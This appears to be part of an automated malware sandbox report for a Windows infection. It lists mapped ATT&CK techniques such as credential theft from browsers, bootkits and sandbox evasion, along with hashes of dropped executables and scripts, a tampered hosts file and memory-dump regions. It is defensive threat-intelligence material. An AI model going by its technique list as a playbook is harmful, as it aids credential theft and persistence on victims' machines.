  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Power Settings

T1653

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
622bf737a997b9a257f15dc3b9ee9da5

SHA1
6beba023f9c081393b64de079969e948a47be8be

SHA256
bcefb9a5dbc47579f8b52cc37fd7591a0e20f00f0a7867df0232088db90273d7

SHA512
c1833c09ef0b3e643b8657874e8a99d7d154ac255c326d85fccba53aa57679e7dad93e61b3b8419937cb7ad936eab727c5edd6c4be6b988982c1d61505305e77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0CMYC78C\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0CMYC78C\soft[1]

Filesize
3.0MB

MD5
91f372706c6f741476ee0dac49693596

SHA1
8e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d

SHA256
9a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781

SHA512
88b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
7f86b0deb162c5b4a4e56567c8764e42

SHA1
fd69ac14e9be3611967c396e3e679e077a605529

SHA256
e6bef41da13ed035c958893d36552e8cf7fcd9b627a898cf84b5be45094188c1

SHA512
ce26b464b41b38c98815dc14f94d9153e6e9fb5c1d00e76389427c8e73f1d9e13370409de29b46d772c50a38254a25efa75d416c98f47ef1010e7e1dcdb87f8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
242864fa38cfb42f8eed89a9a80b510d

SHA1
0981832f0e0ce28fc8dc011072e9f6579d8b16de

SHA256
d409c32deeb1808a9116227000bbeb40b15a3b33bd4c2f16c97ce3b590201442

SHA512
33650c0e18790d0ee0ef772941b03728cb3aa993b79a23287fb1d3ddf17194cd7dba40539c76384d21265b64c25c38ff99ac2caa416611c6f236b0dd9634b0b5

Download Submit
C:\Users\Admin\AppData\Local\TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE

Filesize
1.8MB

MD5
8b52685f1e169e45e3216c48b7143f7c

SHA1
1a88e2750d7bc6ad58a12489409809a878a441cd

SHA256
7f8fbf96731c3c15a22709c6b67ea87b440d1538013345156726d121bacec077

SHA512
962f64bf74454b2e1a3d845c153813cfc71725d5183f4e21c42e6195f72ac3945bb6cb345affb90e978851da8d0e513f3d5fa847acf5a0aca41147221aea133c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10049920101\e6d163131d.exe

Filesize
4.3MB

MD5
8c8941df413b47af8293ee22f6edf1a2

SHA1
faa401d3a3ad288e5965d9f33ab2dc015eb46a09

SHA256
29285737ad299b4249728076472ec13e92ed42dcfb0684bf453b55724ddaca89

SHA512
fac4c80a0c24b76eb7f07b73543183c113f674dd9cf805eebb95e12d2eff7fbd927e3355be97f87834cd2933de8f31c19e603d97ce72a980d4fc354ca88a884f

Download Submit
C:\Users\Admin\AppData\Local\Temp\10049930101\3c788c05e7.exe

Filesize
4.5MB

MD5
ede9e504b3a1c8a72a7ea9885031167a

SHA1
89b804e5a27393e40b584522c712d5e2272dd217

SHA256
b6f438c8d2992bae0d42e202e05895f8b1d6b2b317eab7c10e6f74ecb0146602

SHA512
3b849fb58cd3a9eeca6e0ff1969dcbd19533b9eebc7aa7d76be2023814c9825728617a5c8e8cb1fa0f074e12adc1fc6b05eeb3a6678f8a1b7ce6bd7468b4866f

Download Submit
C:\Users\Admin\AppData\Local\Temp\10429160101\apple.exe

Filesize
327KB

MD5
fda2e2ddccb519a2c1fb72dcaee2de6f

SHA1
efd50828acc3e182aa283c5760278c0da1f428a6

SHA256
cf70392e26ee7d6d24cb39499567052935664d37a1b49572f9d0b5f3f3189f57

SHA512
28c79ed9a9d5db3920b7e942c66670eec02046fa3d751ad18e9b3597caab76645b194bfa18bb5925ecfb8d201a291a44ee427ef39632f673db39edc43111c3cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\10429530101\P3Ow4LV.exe

Filesize
5.0MB

MD5
06e1e6ce976f483d1a7c3353a9b53d98

SHA1
855c1e185407a413a05ae0397c9b400ed3367a6a

SHA256
78a08ea7f22844f4ebe71824da93e5b56c9b43c2218094c5fc3df7a456c72ca8

SHA512
a460cc86ea865d760fc46b796601bb67bc1bc61ef980590202db03f2a7e49b7e30e55b87072ee5721e1f95b72e8765cf296a829da8dfb722f35f3ce68246122b

Download Submit
C:\Users\Admin\AppData\Local\Temp\10429610101\9sWdA2p.exe

Filesize
5.1MB

MD5
d84b0580f3721a680a6761bdfb5f18af

SHA1
1a1e60b2d0a50fa268c6b1ae69f939d6bb1cdbbd

SHA256
0a3015b8106de793930707781764e7823aab2607ed0b1e01efce6a973e92f760

SHA512
9a4d33f6d51c830b6fe4cc534406d7695006844bef09f52b8f73ea5bf534672e8ecd6c7e77ea82ade51c79ce48d741a100bf523329ee3785464f8f36eadd2329

Download Submit
C:\Users\Admin\AppData\Local\Temp\10430250101\amnew.exe

Filesize
429KB

MD5
22892b8303fa56f4b584a04c09d508d8

SHA1
e1d65daaf338663006014f7d86eea5aebf142134

SHA256
87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f

SHA512
852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

Download Submit
C:\Users\Admin\AppData\Local\Temp\10430350101\i4cwegu.exe

Filesize
9.8MB

MD5
9a2147c4532f7fa643ab5792e3fe3d5c

SHA1
80244247bc0bc46884054db9c8ddbc6dee99b529

SHA256
3e8b13abf977519f8aa7ced613234a39ee1a39e07a2915c60c09713677ecdeba

SHA512
c4513062787175cc942cdb0324c1465957bf4d2c48d68a4896daeb427b936ae8d9c78b88f67c456566e8fc32787b1d8b92b3521f7e47e2e90b3f9e10d8498aba

Download Submit
C:\Users\Admin\AppData\Local\Temp\10431490101\Yhihb8G.exe

Filesize
211KB

MD5
5c1bb6cac0b3da6e012442037cf62a64

SHA1
f21a600e3c03309e485668481a2890e9a1f27180

SHA256
d9d77d43ebceb7caf5bee3bf6ad57a608650da4c6542f6870943409c39e9fa7c

SHA512
dd57ac222984c6e72f98b2c22f2f744692c9ba447f41be06a89de2f926b0ce2dad03aecd224df71d24751661ce481cbd7c6301810e5e149e0118d2d132b4aba1

Download Submit
C:\Users\Admin\AppData\Local\Temp\10432080101\TbV75ZR.exe

Filesize
1.9MB

MD5
b53f9756f806ea836d98ff3dc92c8c84

SHA1
05c80bd41c04331457374523d7ab896c96b45943

SHA256
73ca9bc319d447e03a717b4f781aca8dc11a5bec82ace59751f285341e4b137c

SHA512
bd776a3f3ae229fb36f54674323ddeea0a631acfc18578860ed282667fcc5047d2b5033aba4f88f5908d909d0969081a94cb1cb3efbb9ecaeff526c0fb2ecddb

Download Submit
C:\Users\Admin\AppData\Local\Temp\10432090101\dojG16n.exe

Filesize
1.9MB

MD5
16590e96cec0ac435e592faf020e4acc

SHA1
d42c4ab0b94e6de0f3a29fe572e5477117560d49

SHA256
0c6b85162fdbb62e82e6b02a09a519ef21d29fe88884d37464a692db04b4b2c3

SHA512
6827cc42e226e7b7afe1744db85fa6b57f9436354a670351252842bec19b79390494373df6cf6c060530cc66f962d36ab0e1d18238335de3d0aa3f9dd58ae596

Download Submit
C:\Users\Admin\AppData\Local\Temp\10432100101\7IIl2eE.exe

Filesize
1.2MB

MD5
7d842fd43659b1a8507b2555770fb23e

SHA1
3ae9e31388cbc02d4b68a264bbfaa6f98dd0c328

SHA256
66b181b9b35cbbdff3b8d16ca3c04e0ab34d16f5ebc55a9a8b476a1feded970a

SHA512
d7e0a845a1a4e02f0e0e9cf13aa8d0014587ebef1d9f3b16f7d3d9f3dc5cdc2a17aa969af81b5dc4f140b2d540820d39317b604785019f1cbfa50d785970493b

Download Submit
C:\Users\Admin\AppData\Local\Temp\10432110101\UZPt0hR.exe

Filesize
1.2MB

MD5
18b6c58f5f099a577c2f322eba74d1e9

SHA1
11cf8353e6adcf12061b4afb95c63308bda399b2

SHA256
2c5b54f2576e1524d5dc1c5405d2b8cfe72fc16ca2a1c7c319e0961833d9d069

SHA512
3f83df8396fe63f1a0cc1595b9923ebf879e69a24d4cff96cb4460b7143a3f2eaca99379f955af10ad06cc6d8a0fc2d846d40aaafcb258b4a4e6956de89d4d49

Download Submit
C:\Users\Admin\AppData\Local\Temp\10432120101\8ce048e8db.exe

Filesize
2.0MB

MD5
43057c7ea5c6f0c659834f661935b001

SHA1
0a3e04b7192beb503f96a0fe238b5b7b0076a5ce

SHA256
fb474c8fa52972cee95da460d2dc4293299f067984bf42cd8a7858a4d5260b4a

SHA512
52beb172b5e3782a30793399fb574cd2c9fd46dc8231bab4dd9ab05cf031e4805edbf7349775dce27a16a7225bdf6942aeb238b9a24fd6fe235f58209e17693c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10432130101\6526e72213.exe

Filesize
1.8MB

MD5
3d22aed8d05974e5ebf53c51043fd871

SHA1
be1d84484ff33cca4e6a7fc33b98c196e3e9fb08

SHA256
50c84a9e1a2e299f659470e9f56258e462226158e949d8c834faafa250f6e2e7

SHA512
85adaa6869bffb9a64b05dce0b4f9d7dd002edfec117159086a8474606eba7c80b0ee7bcfd130f297156a246c9d83f0875836928b59b53829275b938fc715e1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10432140101\UZSECGPC.exe

Filesize
9.1MB

MD5
68ce1936d40722d372d69744a1e1866f

SHA1
284f9a91158c8796d1eb90094903bfb7e31889d9

SHA256
9d2eb97d89a1d979bf2a57aedf8c1ff77cd934895d890fc45686d547ca0faf11

SHA512
bf687c805aca17e9d333f6a2c8afb9c0cf7ff2955373420cc532858f676beb590ce1359734526e2b2480b413c0e0045f72dcf5f4f16a9a9328ac7dc408b6bb81

Download Submit
C:\Users\Admin\AppData\Local\Temp\10432150101\Rm3cVPI.exe

Filesize
354KB

MD5
27f0df9e1937b002dbd367826c7cfeaf

SHA1
7d66f804665b531746d1a94314b8f78343e3eb4f

SHA256
aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209

SHA512
ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17

Download Submit
C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

Filesize
162B

MD5
9b9de086b372da84e4bd01979b2d501e

SHA1
14bb853a2e1360a92a43564cbbf2b1e654bfd745

SHA256
ff9b231ec4d32420337db47764c66eeab38d07fa42e65637b8f8ac165d5e8eb5

SHA512
5db7723390582ccd93ede00c90036a6276cd98be1bd0bce7c059302bcea2fdb2829ae37cf00f2cfffb481857b21a4ffe2332c1919161a2b5ff05b87f4233e78b

Download Submit
C:\Users\Admin\AppData\Local\Temp\261.exe

Filesize
88KB

MD5
89ccc29850f1881f860e9fd846865cad

SHA1
d781641be093f1ea8e3a44de0e8bcc60f3da27d0

SHA256
4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

SHA512
0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

Download Submit
C:\Users\Admin\AppData\Local\Temp\2B51.tmp\2B52.tmp\2B53.bat

Filesize
1KB

MD5
e5ddb7a24424818e3b38821cc50ee6fd

SHA1
97931d19f71b62b3c8a2b104886a9f1437e84c48

SHA256
4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

SHA512
450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

Download Submit
C:\Users\Admin\AppData\Local\Temp\Expectations.cab

Filesize
25KB

MD5
ccc575a89c40d35363d3fde0dc6d2a70

SHA1
7c068da9c9bb8c33b36aed898fbd39aa061c4ba4

SHA256
c3869bea8544908e2b56171d8cad584bd70d6a81651ca5c7338bb9f67249500e

SHA512
466d3399155a36f2ebc8908dba2838736a2effe4a337a3c49ff57afc59e3394f71c494daa70b02cb13461c3e89c6ad3889e6067a8938d29f832810d41f7d5826

Download Submit
C:\Users\Admin\AppData\Local\Temp\FsqAYJOtl.hta

Filesize
717B

MD5
b539548fba3c90da8cc4e98a0231eef1

SHA1
bbf9307769874fbb0d89fa4fab5fa4105384a98b

SHA256
514af493ac4a7ef6b863d89483aaef775680f5058c9fdf8a9de7a9995ce12da4

SHA512
6d0a4a11d67ef94b58be703127fd8980170aea21d202fc36d597fa585858576c65de57f97c05a2a805bd7edb7cae2f6a7341316dd7d8c47580a4149369ad42f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_okens1ln.nsk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost015.exe

Filesize
2.9MB

MD5
b826dd92d78ea2526e465a34324ebeea

SHA1
bf8a0093acfd2eb93c102e1a5745fb080575372e

SHA256
7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b

SHA512
1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpDF61.tmp.dat

Filesize
160KB

MD5
9b85a4b842b758be395bc19aba64799c

SHA1
c32922b745c9cf827e080b09f410b4378560acb3

SHA256
ecc8d7540d26e3c2c43589c761e94638fc5096af874d7df216e833b9599c673a

SHA512
fad80745bb64406d8f2947c1e69817cff57cc504d5a8cdca9e22da50402d27d005988f6759eaa91f1f7616d250772c9f5e4ec2f98ce7264501dd4f436d1665f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\{120E058A-DF8C-4251-B057-DA675FD21223}\0x0409.ini

Filesize
21KB

MD5
a108f0030a2cda00405281014f897241

SHA1
d112325fa45664272b08ef5e8ff8c85382ebb991

SHA256
8b76df0ffc9a226b532b60936765b852b89780c6e475c152f7c320e085e43948

SHA512
d83894b039316c38915a789920758664257680dcb549a9b740cf5361addbee4d4a96a3ff2999b5d8acfb1d9336da055ec20012d29a9f83ee5459f103fbeec298

Download Submit
C:\Users\Admin\AppData\Local\Temp\{120E058A-DF8C-4251-B057-DA675FD21223}\ISSetup.dll

Filesize
1.6MB

MD5
a89bf69cd0836e08a79d5c216ae776ed

SHA1
7d7ff6143a729726f200b2201c4a0e7358d2274b

SHA256
a01709a3c9d5eaacc6ca6ca47ef2e4e4e00d883289621c5bfff96620bfd93d8c

SHA512
206d05888d2cbb20dcf433abceab7c47597fe6cb15167a71c5486dd3098f59c44ac14e5459921ec4d546d2e55fda34c5119c128691edcfbf75724bb4e1cc7366

Download Submit
C:\Users\Admin\AppData\Local\Temp\{763FB6B0-5054-4DD0-9BC5-7AFFCE46154B}\{38C49E83-05E9-4C6A-9256-6AA74482FDC5}\DIFxData.ini

Filesize
84B

MD5
1eb6253dee328c2063ca12cf657be560

SHA1
46e01bcbb287873cf59c57b616189505d2bb1607

SHA256
6bc8b890884278599e4c0ca4095cefdf0f5394c5796012d169cc0933e03267a1

SHA512
7c573896abc86d899afbce720690454c06dbfafa97b69bc49b8e0ddec5590ce16f3cc1a30408314db7c4206aa95f5c684a6587ea2da033aecc4f70720fc6189e

Download Submit
C:\Users\Admin\AppData\Local\Temp\{763FB6B0-5054-4DD0-9BC5-7AFFCE46154B}\{38C49E83-05E9-4C6A-9256-6AA74482FDC5}\_isres_0x0409.dll

Filesize
1.8MB

MD5
7de024bc275f9cdeaf66a865e6fd8e58

SHA1
5086e4a26f9b80699ea8d9f2a33cead28a1819c0

SHA256
bd32468ee7e8885323f22eabbff9763a0f6ffef3cc151e0bd0481df5888f4152

SHA512
191c57e22ea13d13806dd390c4039029d40c7532918618d185d8a627aabc3969c7af2e532e3c933bde8f652b4723d951bf712e9ba0cc0d172dde693012f5ef1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\{763FB6B0-5054-4DD0-9BC5-7AFFCE46154B}\{38C49E83-05E9-4C6A-9256-6AA74482FDC5}\_isuser_0x0409.dll

Filesize
12KB

MD5
83fd84ec69956ad392945f085bb1de3a

SHA1
eeb7f3691b4bf0d800b055d3e064cb4877951c11

SHA256
6fa54f482c08b06fdcf7aca20b49f4bb0faa1ac67a68fe99878b6b66896724f6

SHA512
7ccd10f0271f7b97e3970a798de11438c5bd914def33ba6e8cc481c9876a54bc89756c02fd0eadc3ff96bc3b59cfebc1e5b0b59b83353a8ed1e8da6e8d54d958

Download Submit
C:\Users\Admin\AppData\Local\Temp\{763FB6B0-5054-4DD0-9BC5-7AFFCE46154B}\{38C49E83-05E9-4C6A-9256-6AA74482FDC5}\isrt.dll

Filesize
426KB

MD5
8af02bf8e358e11caec4f2e7884b43cc

SHA1
16badc6c610eeb08de121ab268093dd36b56bf27

SHA256
58a724d23c63387a2dda27ccfdbc8ca87fd4db671bea8bb636247667f6a5a11e

SHA512
d0228a8cc93ff6647c2f4ba645fa224dc9d114e2adb5b5d01670b6dafc2258b5b1be11629868748e77b346e291974325e8e8e1192042d7c04a35fc727ad4e3fd

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
3KB

MD5
00930b40cba79465b7a38ed0449d1449

SHA1
4b25a89ee28b20ba162f23772ddaf017669092a5

SHA256
eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

SHA512
cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

Download Submit
memory/1348-570-0x0000000000400000-0x0000000000682000-memory.dmp

Filesize
2.5MB

Download
memory/1836-171-0x0000023BFA8B0000-0x0000023BFA8BA000-memory.dmp

Filesize
40KB

Download
memory/1836-170-0x0000023BFA870000-0x0000023BFA878000-memory.dmp

Filesize
32KB

Download
memory/1836-169-0x0000023BFA860000-0x0000023BFA86A000-memory.dmp

Filesize
40KB

Download
memory/1836-168-0x0000023BFB050000-0x0000023BFB06C000-memory.dmp

Filesize
112KB

Download
memory/1836-156-0x0000023BFA880000-0x0000023BFA8A2000-memory.dmp

Filesize
136KB

Download
memory/1988-24-0x0000000007B40000-0x0000000007B62000-memory.dmp

Filesize
136KB

Download
memory/1988-16-0x00000000061B0000-0x0000000006504000-memory.dmp

Filesize
3.3MB

Download
memory/1988-17-0x0000000006680000-0x000000000669E000-memory.dmp

Filesize
120KB

Download
memory/1988-19-0x0000000007FC0000-0x000000000863A000-memory.dmp

Filesize
6.5MB

Download
memory/1988-18-0x00000000066D0000-0x000000000671C000-memory.dmp

Filesize
304KB

Download
memory/1988-4-0x00000000056D0000-0x00000000056F2000-memory.dmp

Filesize
136KB

Download
memory/1988-20-0x0000000006BD0000-0x0000000006BEA000-memory.dmp

Filesize
104KB

Download
memory/1988-3-0x0000000005730000-0x0000000005D58000-memory.dmp

Filesize
6.2MB

Download
memory/1988-23-0x0000000007BE0000-0x0000000007C76000-memory.dmp

Filesize
600KB

Download
memory/1988-5-0x0000000005FD0000-0x0000000006036000-memory.dmp

Filesize
408KB

Download
memory/1988-2-0x00000000050C0000-0x00000000050F6000-memory.dmp

Filesize
216KB

Download
memory/1988-25-0x0000000008BF0000-0x0000000009194000-memory.dmp

Filesize
5.6MB

Download
memory/1988-6-0x0000000006040000-0x00000000060A6000-memory.dmp

Filesize
408KB

Download
memory/2116-573-0x0000000000840000-0x0000000000842000-memory.dmp

Filesize
8KB

Download
memory/2304-437-0x0000000000400000-0x0000000000E1C000-memory.dmp

Filesize
10.1MB

Download
memory/2304-352-0x0000000000400000-0x0000000000E1C000-memory.dmp

Filesize
10.1MB

Download
memory/2564-479-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/2564-480-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/2588-590-0x0000000000BA0000-0x0000000001063000-memory.dmp

Filesize
4.8MB

Download
memory/2796-453-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2796-454-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2796-663-0x0000000000DC0000-0x0000000001268000-memory.dmp

Filesize
4.7MB

Download
memory/2796-838-0x0000000000DC0000-0x0000000001268000-memory.dmp

Filesize
4.7MB

Download
memory/2824-261-0x0000000000400000-0x0000000000CC4000-memory.dmp

Filesize
8.8MB

Download
memory/2824-362-0x0000000000400000-0x0000000000CC4000-memory.dmp

Filesize
8.8MB

Download
memory/2892-243-0x00000000001E0000-0x0000000000FC9000-memory.dmp

Filesize
13.9MB

Download
memory/2892-354-0x00000000001E0000-0x0000000000FC9000-memory.dmp

Filesize
13.9MB

Download
memory/2896-431-0x0000000000BA0000-0x0000000001063000-memory.dmp

Filesize
4.8MB

Download
memory/2896-47-0x0000000000BA0000-0x0000000001063000-memory.dmp

Filesize
4.8MB

Download
memory/2896-121-0x0000000000BA0000-0x0000000001063000-memory.dmp

Filesize
4.8MB

Download
memory/2896-322-0x0000000000BA0000-0x0000000001063000-memory.dmp

Filesize
4.8MB

Download
memory/2896-96-0x0000000000BA0000-0x0000000001063000-memory.dmp

Filesize
4.8MB

Download
memory/2896-80-0x0000000000BA0000-0x0000000001063000-memory.dmp

Filesize
4.8MB

Download
memory/2896-536-0x0000000000BA0000-0x0000000001063000-memory.dmp

Filesize
4.8MB

Download
memory/2896-81-0x0000000000BA0000-0x0000000001063000-memory.dmp

Filesize
4.8MB

Download
memory/2896-462-0x0000000000BA0000-0x0000000001063000-memory.dmp

Filesize
4.8MB

Download
memory/2896-226-0x0000000000BA0000-0x0000000001063000-memory.dmp

Filesize
4.8MB

Download
memory/2912-48-0x0000000000050000-0x0000000000513000-memory.dmp

Filesize
4.8MB

Download
memory/2912-33-0x0000000000050000-0x0000000000513000-memory.dmp

Filesize
4.8MB

Download
memory/3008-668-0x0000000000400000-0x00000000008A5000-memory.dmp

Filesize
4.6MB

Download
memory/3008-635-0x0000000000400000-0x00000000008A5000-memory.dmp

Filesize
4.6MB

Download
memory/3052-413-0x0000000002DF0000-0x0000000002E50000-memory.dmp

Filesize
384KB

Download
memory/3252-360-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/3252-438-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/3252-357-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/3252-457-0x0000000010000000-0x000000001001C000-memory.dmp

Filesize
112KB

Download
memory/3252-483-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/4020-435-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/4020-433-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/4020-481-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/4020-547-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/4064-213-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4064-214-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4064-219-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4064-220-0x0000000000B60000-0x0000000000B80000-memory.dmp

Filesize
128KB

Download
memory/4064-217-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4064-215-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4064-221-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4064-222-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4064-224-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4064-225-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4064-223-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4064-216-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4064-218-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4520-98-0x0000000000BA0000-0x0000000001063000-memory.dmp

Filesize
4.8MB

Download
memory/4680-196-0x0000024C34A30000-0x0000024C34A4C000-memory.dmp

Filesize
112KB

Download
memory/4680-197-0x0000024C34A50000-0x0000024C34B05000-memory.dmp

Filesize
724KB

Download
memory/4680-198-0x0000024C34B10000-0x0000024C34B1A000-memory.dmp

Filesize
40KB

Download
memory/4680-199-0x0000024C34CC0000-0x0000024C34CDA000-memory.dmp

Filesize
104KB

Download
memory/4680-200-0x0000024C34CA0000-0x0000024C34CA6000-memory.dmp

Filesize
24KB

Download
memory/5340-116-0x0000000001150000-0x0000000001151000-memory.dmp

Filesize
4KB

Download
memory/5340-117-0x00000000030D0000-0x0000000003130000-memory.dmp

Filesize
384KB

Download
memory/5632-743-0x000002057E850000-0x000002057E905000-memory.dmp

Filesize
724KB

Download
memory/5636-209-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5636-212-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5636-208-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5636-207-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5636-206-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5636-205-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5956-281-0x0000000004E40000-0x0000000005002000-memory.dmp

Filesize
1.8MB

Download
memory/5956-314-0x0000000006DC0000-0x0000000006E52000-memory.dmp

Filesize
584KB

Download
